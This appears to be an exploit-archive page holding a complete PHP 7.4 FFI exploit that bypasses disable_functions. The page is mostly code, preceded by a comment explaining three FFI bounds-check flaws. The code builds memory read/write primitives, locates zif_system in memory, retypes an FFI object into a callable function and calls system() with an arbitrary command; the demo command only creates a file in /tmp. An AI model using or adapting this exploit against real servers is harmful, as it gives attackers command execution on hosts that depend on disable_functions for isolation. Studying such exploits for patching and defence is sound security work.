Php 7.4 ffi disable_functions bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-07-07 | Type : webapps | Platform : php
This exploit / vulnerability Php 7.4 ffi disable_functions bypass is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

<?php
/*
FFI Exploit - uses 3 potential BUGS.
PHP was contacted and said nothing in FFI is a security issue.

Able to call system($cmd) without using FFI::load() or FFI::cdefs()

* BUG #1 (maybe intended, but why have any size checks then?)
no bounds check for FFI::String() when type is ZEND_FFI_TYPE_POINTER
(https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4411)

* BUG #2 (maybe intended, but why have any checks then?)
no bounds check for FFI::memcpy when type is ZEND_FFI_TYPE_POINTER
(https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4286)

* BUG #3
Can walk back CDATA object to get a pointer to its internal reference pointer using FFI::addr()
call FFI::addr on a CDATA object to get its pointer (also a CDATA object), then call FFI::addr
on the resulting ptr to get a handle to it's ptr, which is the ptr_holder for the original CDATA
object


the easiest way is to create cdata object, write target RIP (zif_system's address) to it
and finally modify it's zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it

Exploit steps:
1. Use read/write to leak zif_system pointer
a. walk cdata object to leak handlers pointer ( in .bss )
b. scan .bss for pointer to a known value ( *.rodata ptr), that we know usually sits
right below a pointer to the .data.relro segment
c. Increment and read the .data.relro pointer to get a relro section leak
d. Using the relro section leak, scan up memory looking for the 'system' string that is
inside the zif_system relro entry.
e. once found, increment and leak the zif_system pointer
2. Hijack RIP with complete argument control
a. create a function pointer CDATA object using FFI::new() [not callable as it is
technically not a propper ZEND_FFI_TYPE_FUNC since it wasnt made with FFI::cdef()
b. Overwrite the object'd data with zif_system pointer
c. Overwrite the objects zend_ffi_type_kind with ZEND_FFI_TYPE_FUNC so that it is
callable with our own arguments
3. Create proper argument object to pass to zif_system (zend_execute_data .. )
a. Build out the zend_execute_data object in a php string
b. right after the object is the argument object itself (zval) which we must also
build. To do so we build our PHP_STRING in another FFI buffer, leak the pointer
and place it into a fake zval STRING object.
c. finally we can call zif_system with a controlled argument

NOTE: does NOT exit cleanly nor give command output -- both may be possible

Author: Hunter Gregal
Tested on:
- PHP 7.4.7 x64 Ubuntu 20, ./confiure --disable-all --with-ffi
- PHP 7.4.3 x64 Ubuntu 20 (apt install)
*/

ini_set("display_errors", "On");
error_reporting(E_ALL);

function pwn($cmd) {
function allocate($amt, $fill) {
// could do $persistent = TRUE to alloc on libc malloc heap instead
// but we already have a good read/write primitive
// and relying on libc leaks for gadgets is not very portable
// (custome compiled libc -> see pornhub php 0-day)
$buf = FFI::new("char [".$amt."]");
$bufPtr = FFI::addr($buf);
FFI::memset($bufPtr, $fill, $amt);
// not sure if i need to keep the CData reference alive
// or not - but just in case return it too for now
return array($bufPtr, $buf);
}

// uses leak to leak data from FFI ptr
function leak($ptr, $n, $hex) {
if ( $hex == 0 ) {
return FFI::string($ptr, $n);
} else {
return bin2hex(FFI::string($ptr, $n));
}
}

function ptrVal($ptr) {
$tmp = FFI::cast("uint64_t", $ptr);
return $tmp->cdata;
}

/* Read primative
writes target address overtop of CDATA object pointer,
then leaks directly from the CDATA object
*/
function Read($addr, $n = 8, $hex = 0) {
// Create vulnBuf which we walk back to do the overwrite
// (the size and contents dont really matter)
list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
// walk back to get ptr to ptr (heap)
$vulnBufPtrPtr = FFI::addr($vulnBufPtr);
/*// DEBUG
$vulnBufPtrVal = ptrVal($vulnBufPtr);
$vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal));
printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal));
printf("-------\n\n");
*/

// Overwrite the ptr
$packedAddr = pack("Q",$addr);
FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);

// Leak the overwritten ptr
return leak($vulnBufPtr, $n, $hex);
}

/* Write primative
writes target address overtop of CDATA object pointer,
then writes directly to the CDATA object
*/
function Write($addr, $what, $n) {
// Create vulnBuf which we walk back to do the overwrite
// (the size and contents dont really matter)
list($vulnBufPtr, $vulnBuf) = allocate(1, 0x42); // B*8
// walk back to get ptr to ptr (heap)
$vulnBufPtrPtr = FFI::addr($vulnBufPtr);
/*// DEBUG
$vulnBufPtrVal = ptrVal($vulnBufPtr);
$vulnBufPtrPtrVal = ptrVal($vulnBufPtrPtr);
printf("vuln BufPtr = %s\n", dechex($vulnBufPtrVal));
printf("vuln BufPtrPtr = %s\n", dechex($vulnBufPtrPtrVal));
printf("-------\n\n");
*/

// Overwrite the ptr
$packedAddr = pack("Q",$addr);
FFI::memcpy($vulnBufPtrPtr, $packedAddr, 8);

// Write to the overwritten ptr
FFI::memcpy($vulnBufPtr, $what, $n);
}

function isPtr($knownPtr, $testPtr) {
if ( ($knownPtr & 0xFFFFFFFF00000000) == ($testPtr & 0xFFFFFFFF00000000)) {
return 1;
} else {
return 0;
}
}

/* Walks looking for valid pointers
* - each valid ptr is read and if it
- points to the target return the address of the
- ptr and the location it was found
*/
//function getRodataAddr($bssLeak) {
function walkSearch($segmentLeak, $maxQWORDS, $target, $size = 8, $up = 0) {
$start = $segmentLeak;
for($i = 0; $i < $maxQWORDS; $i++) {
if ( $up == 0 ) { // walk 'down' addresses
$addr = $start - (8 * $i);
} else { // walk 'up' addresses
$addr = $start + (8 * $i);
}
//$leak = Read($addr, 8);
$leak = unpack("Q", Read($addr))[1];

// skip if its not a valid pointer...
if ( isPtr($segmentLeak, $leak) == 0 ) {
continue;
}
$leak2 = Read($leak, $n = $size);
//printf("0x%x->0x%x = %s\n", $addr, $leak, $leak2);
if( strcmp($leak2, $target) == 0 ) { # match
return array ($leak, $addr);
}
}
return array(0, 0);
}

function getBinaryBase($textLeak) {
$start = $textLeak & 0xfffffffffffff000;
for($i = 0; $i < 0x10000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = Read($addr, 7);
//if($leak == 0x10102464c457f) { # ELF header
if( strcmp($leak, "\x7f\x45\x4c\x46\x02\x01\x01") == 0 ) { # ELF header
return $addr;
}
}
return 0;
}

function parseElf($base) {
$e_type = unpack("S", Read($base + 0x10, 2))[1];

$e_phoff = unpack("Q", Read($base + 0x20))[1];
$e_phentsize = unpack("S", Read($base + 0x36, 2))[1];
$e_phnum = unpack("S", Read($base + 0x38, 2))[1];

for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = unpack("L", Read($header, 4))[1];
$p_flags = unpack("L", Read($header + 4, 4))[1];
$p_vaddr = unpack("Q", Read($header + 0x10))[1];
$p_memsz = unpack("Q", Read($header + 0x28))[1];

if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}

if(!$data_addr || !$text_size || !$data_size)
return false;

return [$data_addr, $text_size, $data_size];
}

function getBasicFuncs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = unpack("Q", Read($data_addr+ ($i * 8)))[1];
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = unpack("Q", Read($leak))[1];
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = unpack("Q", Read($data_addr + (($i + 4) * 8)))[1];
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = unpack("Q", Read($leak))[1];
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}

function getSystem($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = unpack("Q", Read($addr))[1];
$f_name = Read($f_entry, 6) . "\0";

if( strcmp($f_name, "system\0") == 0) { # system
return unpack("Q", Read($addr + 8))[1];
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
// Convenient for debugging
function crash() {
Write(0x0, "AAAA", 4);
}


printf("\n[+] Starting exploit...\n");
// --------------------------- start of leak zif_system address
/* NOTE: typically we would leak a .text address and
walk backwards to find the ELF header. From there we can parse
the elf information to resolve zif_system - in our case the
base PHP binary image with the ELF head is on its own mapping
that does not border the .text segment. So we need a creative
way to get zif_system
*/
/* ---- First, we use our read to walk back to the our Zend_object,
// and get its zend_object_handlers* which will point to the
// php binary symbols zend_ffi_cdata_handlers in the .bss.
//
//_zend_ffi_cdata.ptr-holder - _zend_ffi_cdata.ptr.std.handlers == 6 QWORDS
//
// From there we search for a ptr to a known value (happens to be to the .rodata section)
// that just so happens to sit right below a ptr to the 'zend_version' relro entry.
// So we do some checks on that to confirm it is infact a valid ptr to the .data.relro.
//
// Finally we walk UP the relro entries looking for the 'system' (zif_system) entry.

(zend_types.h)
struct _zend_object { <-----typdef zend_object
zend_refcounted_h gc;
uint32_t handle; // may be removed ???
end_class_entry *ce;
const zend_object_handlers *handlers; <--- func ptrs
HashTable *properties;
zval properties_table[1];
};
(ffi.c)
typedef struct _zend_ffi_cdata {
zend_object std;
zend_ffi_type *type;
void *ptr; <--- OVERWRITE
void *ptr_holder; <--
zend_ffi_flags flags;
} zend_ffi_cdata;

*/

list($dummyPtr, $dummy) = allocate(64, 0x41);
// dummy buf ptr
$dummyPtrVal = ptrVal($dummyPtr);

// dummy buf ptr ptr
$dummyPtrPtr = FFI::addr($dummyPtr);
$dummyPtrPtrVal = ptrVal($dummyPtrPtr);

printf("Dummy BufPtr = 0x%x\n", $dummyPtrVal);
printf("Dummy BufPtrPtr = 0x%x\n", $dummyPtrPtrVal);
$r = leak($dummyPtr, 64, 1);
printf("Dummy buf:\n%s\n", $r);
printf("-------\n\n");

/*
// ------ Test our read and write
$r = Read($dummyPtrVal, 256, 1);
printf("Read Test (DummyBuf):\n%s\n", $r);

Write($dummyPtrVal, "CCCCCCCC", 8);
$r = Read($dummyPtrVal, 256, 1);
printf("Write Test (DummyBuf):\n%s\n", $r);
// ----------
*/

$handlersPtrPtr = $dummyPtrPtrVal - (6 * 8);
printf("_zend_ffi_cdata.ptr.std.handlers = 0x%x\n", $handlersPtrPtr);

$handlersPtr = unpack("Q", Read($handlersPtrPtr))[1]; // --> zend_ffi_cdata_handlers -> .bss
printf("zend_ffi_cdata_handlers = 0x%x\n", $handlersPtr);

// Find our 'known' value in the .rodata section -- in this case 'CORE'
// (backup can be 'STDIO)'
list($rodataLeak, $rodataLeakPtr) = walkSearch($handlersPtr, 0x400,"Core", $size=4);
if ( $rodataLeak == 0 ) {
// If we failed let's just try to find PHP's base and hope for the best
printf("Get rodata addr failed...trying for last ditch effort at PHP's ELF base\n");
// use .txt leak
$textLeak = unpack("Q", Read($handlersPtr+16))[1]; // zned_objects_destroy_object
printf(".textLeak = 0x%x\n", $textLeak);
$base = getBinaryBase($textLeak);
if ( $base == 0 ) {
die("Failed to get binary base\n");
}
printf("BinaryBase = 0x%x\n", $base);
// parse elf
if (!($elf = parseElf($base))) {
die("failed to parseElf\n");
}
if (!($basicFuncs = getBasicFuncs($base, $elf))) {
die("failed to get basic funcs\n");
}
if (!($zif_system = getSystem($basicFuncs))) {
die("Failed to get system\n");
}
// XXX HERE XXX
//die("Get rodata addr failed\n");
} else {
printf(".rodata leak ('CORE' ptr) = 0x%x->0x%x\n", $rodataLeakPtr, $rodataLeak);

// Right after the "Core" ptrptr is zend_version's relro entry - XXX this may not be static
// zend_version is in .data.rel.ro
$dataRelroPtr = $rodataLeakPtr + 8;
printf("PtrPtr to 'zend_verson' relro entry: 0x%x\n", $dataRelroPtr);

// Read the .data.relro potr
$dataRelroLeak = unpack("Q", Read($dataRelroPtr))[1];
if ( isPtr($dataRelroPtr, $dataRelroLeak) == 0 ) {
die("bad zend_version entry pointer\n");
}
printf("Ptr to 'zend_verson' relro entry: 0x%x\n", $dataRelroLeak);

// Confirm this is a ptrptr to zend_version
$r = unpack("Q", Read($dataRelroLeak))[1];
if ( isPtr($dataRelroLeak, $r) == 0 ) {
die("bad zend_version entry pointer\n");
}

printf("'zend_version' string ptr = 0x%x\n", $r);

$r = Read($r, $n = 12);
if ( strcmp($r, "zend_version") ) {
die("Failed to find zend_version\n");
}
printf("[+] Verified data.rel.ro leak @ 0x%x!\n", $dataRelroLeak);


/* Walk FORWARD the .data.rel.ro segment looking for the zif_system entry
- this is a LARGE section...
*/
list($systemStrPtr, $systemEntryPtr) = walkSearch($dataRelroLeak, 0x3000, "system", $size = 6, $up =1);
if ( $systemEntryPtr == 0 ) {
die("Failed to find zif_system relro entry\n");
}
printf("system relro entry = 0x%x\n", $systemEntryPtr);
$zif_systemPtr = $systemEntryPtr + 8;
$r = unpack("Q", Read($zif_systemPtr))[1];
if ( isPtr($zif_systemPtr, $r) == 0 ) {
die("bad zif_system pointer\n");
}
$zif_system = $r;
}
printf("[+] zif_system @ 0x%x\n", $zif_system);

// --------------------------- end of leak zif_system address
// --------------------------- start call zif_system


/* To call system in a controlled manner
the easiest way is to create cdata object, write target RIP (zif_system's address) to it
and finally modify it's zend_ffi_type_kind to ZEND_FFI_TYPE_FUNC to call it
*/
$helper = FFI::new("char* (*)(const char *)");
//$helper = FFI::new("char* (*)(const char *, int )"); // XXX if we want return_val control
$helperPtr = FFI::addr($helper);

//list($helperPtr, $helper) = allocate(8, 0x43);
//$x[0] = $zif_system;
$helperPtrVal = ptrVal($helperPtr);
$helperPtrPtr = FFI::addr($helperPtr);
$helperPtrPtrVal = ptrVal($helperPtrPtr);
printf("helper.ptr_holder @ 0x%x -> 0x%x\n", $helperPtrPtrVal, $helperPtrVal);

// Walk the type pointers
//$helperObjPtr = $helperPtrPtrVal - (9 *8); // to top of cdata object
//printf("helper CDATA object @ 0x%x\n", $helperObjPtr);
$helperTypePtrPtr = $helperPtrPtrVal - (2 *8); // 2 DWORDS up the struct to *type ptr
//printf("helper CDATA type PtrPtr @ 0x%x\n", $helperTypePtrPtr);
$r = unpack("Q", Read($helperTypePtrPtr))[1];
if ( isPtr($helperTypePtrPtr, $r) == 0 ) {
die("bad helper type pointer\n");
}
$helperTypePtr = $r;

// Confirm it's currently ZEND_FFI_TYPE_VOID (0)
$r = Read($helperTypePtr, $n=1, $hex=1);
if ( strcmp($r, "00") ) {
die("Unexpected helper type!\n");
}

printf("Current helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_VOID (0)\n", $helperTypePtrPtr, $helperTypePtr);

// Set it to ZEND_FFI_TYPE_FUNC (16 w/ HAVE_LONG_DOUBLE else 15)
Write($helperTypePtr, "\x10", 1);

printf("Swapped helper CDATA type @ 0x%x -> 0x%x -> ZEND_FFI_TYPE_FUNC (16)\n", $helperTypePtrPtr, $helperTypePtr);

// Finally write zif_system to the value
Write($helperPtrVal, pack("Q", $zif_system), 8);

// --------------------------- end of leak zif_system address
// ----------------------- start of build zif_system argument
/*
zif_system takes 2 args -> zif_system(*zend_execute_data, return_val)
For now I don't bother with the return_val, although tehnically we could control
it and potentially exit cleanly
*/

// ----------- start of setup zend_execute_data object

/* Build valid zend_execute object
struct _zend_execute_data {
const zend_op *opline; /* executed opline
zend_execute_data *call; /* current call
zval *return_value;
zend_function *func; /* executed function
zval This; /* this + call_info + num_args
zend_execute_data *prev_execute_data;
zend_array *symbol_table;
void **run_time_cache; /* cache op_array->run_time_cache
}; //0x48 bytes
*/

//This.u2.num_args MUST == our number of args (1 or 2 apparantly..) [6 QWORD in execute_data]
$execute_data = str_shuffle(str_repeat("C", 5*8)); // 0x28 C's
$execute_data .= pack("L", 0); // this.u1.type
$execute_data .= pack("L", 1); // this.u2.num_args
$execute_data .= str_shuffle(str_repeat("A", 0x18)); // fill out rest of zend_execute obj
$execute_data .= str_shuffle(str_repeat("D", 8)); //padding

// ----------- end of setup zend_execute_data object
// ----------- start of setup argument object
/* the ARG (zval) object lays after the execute_data object

zval {
value = *cmdStr ([16 bytes] + [QWORD string size] + [NULL terminated string])
u1.type = 6 (IS_STRING)
u2.???? = [unused]
}
*/

/*
// Let's get our target command setup in a controlled buffer
// TODO - use the dummy buf?
// the string itself is odd. it has 16 bytes prepended to it that idk what it is
// the whole argument after the zend_execute_data object looks like
*/

$cmd_ = str_repeat("X", 16); // unk padding
$cmd_ .= pack("Q", strlen($cmd)); // string len
$cmd_ .= $cmd . "\0"; // ensure null terminated!
list($cmdBufPtr, $cmdBuf) = allocate(strlen($cmd_), 0);
$cmdBufPtrVal = ptrVal($cmdBufPtr);
FFI::memcpy($cmdBufPtr, $cmd_, strlen($cmd_));
printf("cmdBuf Ptr = 0x%x\n", $cmdBufPtrVal);

// Now setup the zval object itself
$zval = pack("Q", $cmdBufPtrVal); // zval.value (pointer to cmd string)
$zval .= pack("L", 6); // zval.u1.type (IS_STRING [6])
$zval .= pack("L", 0); // zval.u2 - unused

$execute_data .= $zval;

// ---------- end of setup argument object
// ----------------------- start of build zif_system argument
$res = $helper($execute_data);
//$return_val = 0x0; // // XXX if we want return_val control
//$res = $helper($execute_data, $return_val); // XXX if we want return_val control
// --------------------------- end of call zif_system
}
pwn("touch /tmp/WIN2.txt");
?>